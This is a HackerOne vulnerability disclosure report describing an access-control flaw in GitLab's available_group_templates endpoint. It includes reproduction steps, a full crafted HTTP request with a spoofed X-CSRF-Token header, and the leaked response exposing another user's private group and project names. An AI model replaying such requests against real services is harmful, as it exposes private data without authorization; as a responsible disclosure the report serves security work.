Disclosure of Any User's Private Group Info by `available_group_templates`

HackerOne report #475240 by ngalog on 2019-01-06, assigned to asaba:

Summary: Lately gitlab allow user to create project from group template, the newly introduced endpoint didn't perform access control check, allowing unauthorized user to access the private group info of other users.

Steps To Reproduce:

• Login gitlab.com
• visit https://gitlab.com/users/ashleyjohnson/available_group_templates
• In burp send the request to repeater
• add this line in header

X-CSRF-Token: testing

The full request should look like

GET /users/ashleyjohnson/available_group_templates HTTP/1.1
Host: gitlab.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-Token: X-CSRF-Token: testing
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Cookie: xxx
Upgrade-Insecure-Requests: 1

Then my private group new-jjj-groupaaa is leaked, and the all of the project name/namespace gitlab-ce are leaked too

leaked info

var target = $(".project-templates-buttons#custom-group-project-templates");
target.empty();
target.html("<div class=\"custom-project-templates\">\n<div class=\"border-top-0 expanded js-template-group-options template-group-options\">\n<div class=\"template-header d-flex align-items-center\">\n<div class=\"template-subgroup d-flex flex-fill align-items-center\">\n<div class=\"template-options-icon-container d-flex justify-content-center align-items-center append-right-10\">\n<svg class=\"s16 options-expanded-icon\"><use xlink:href=\"https://gitlab.com/assets/icons-1bbf3f0e2e8f631ea6006c647f843db214684476054223102c16630dabc450d4.svg#angle-down\"><\/use><\/svg>\n<svg class=\"s16 options-collapsed-icon\"><use xlink:href=\"https://gitlab.com/assets/icons-1bbf3f0e2e8f631ea6006c647f843db214684476054223102c16630dabc450d4.svg#angle-right\"><\/use><\/svg>\n<\/div>\n<div class=\"avatar-container s40\">\n<div class=\"btn-template-icon avatar s40 avatar-tile identicon bg4\">N<\/div>\n<\/div>\n<div class=\"template-subgroup-name prepend-left-5\">\n<strong>newsub<\/strong>\n<\/div>\n<\/div>\n<div class=\"template-subgroup-project-count\">\n<span class=\"badge badge-pill\">\n<strong>\n2\n<\/strong>\n<\/span>\n<\/div>\n<\/div>\n<div class=\"template-option align-items-center\">\n<div class=\"avatar-container s40\">\n<img alt=\"tempalte\" class=\"btn-template-icon avatar s40 avatar-tile\" src=\"https://gitlab.com/uploads/-/system/project/avatar/10227470/logo-extra-whitespace.png\" />\n<\/div>\n<div class=\"description prepend-left-5\">\n<strong>\ntempalte\n<\/strong>\n<br>\n<div class=\"text-muted\">\nteamplte\n<\/div>\n<\/div>\n<div class=\"controls d-flex align-items-baseline\">\n<a class=\"btn btn-default append-right-10\" href=\"/new-jjj-groupaaa/newsub/tempalte\" rel=\"noopener noreferrer\" target=\"_blank\">\nPreview\n<\/a>\n<label class=\"btn btn-success custom-template-button choose-template append-bottom-0\" for=\"tempalte\">\n<input autocomplete=\"off\" data-subgroup-id=\"4324729\" id=\"tempalte\" name=\"project[template_name]\" type=\"radio\" value=\"tempalte\">\n<span>\nUse template\n<\/span>\n<\/label>\n<\/div>\n<\/div>\n<div class=\"template-option align-items-center\">\n<div class=\"avatar-container s40\">\n<img alt=\"GitLab Community Edition\" class=\"btn-template-icon avatar s40 avatar-tile\" src=\"https://gitlab.com/uploads/-/system/project/avatar/10181735/logo-extra-whitespace.png\" />\n<\/div>\n<div class=\"description prepend-left-5\">\n<strong>\nGitLab Community Edition\n<\/strong>\n<br>\n<div class=\"text-muted\">\nGitLab Community Edition (CE) is an open source end-to-end software development platform with built-in version control, issue tracking, code review, CI/CD, and more. Self-host GitLab CE on your own servers, in a container, or on a cloud provider.\n<\/div>\n<\/div>\n<div class=\"controls d-flex align-items-baseline\">\n<a class=\"btn btn-default append-right-10\" href=\"/new-jjj-groupaaa/newsub/gitlab-ce\" rel=\"noopener noreferrer\" target=\"_blank\">\nPreview\n<\/a>\n<label class=\"btn btn-success custom-template-button choose-template append-bottom-0\" for=\"GitLab Community Edition\">\n<input autocomplete=\"off\" data-subgroup-id=\"4324729\" id=\"GitLab Community Edition\" name=\"project[template_name]\" type=\"radio\" value=\"GitLab Community Edition\">\n<span>\nUse template\n<\/span>\n<\/label>\n<\/div>\n<\/div>\n<\/div>\n\n<\/div>\n");
target.trigger("ajax:success");

Impact

leaked this info to any unauthorised user

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• Screen_Shot_2019-01-06_at_10.35.55_PM.png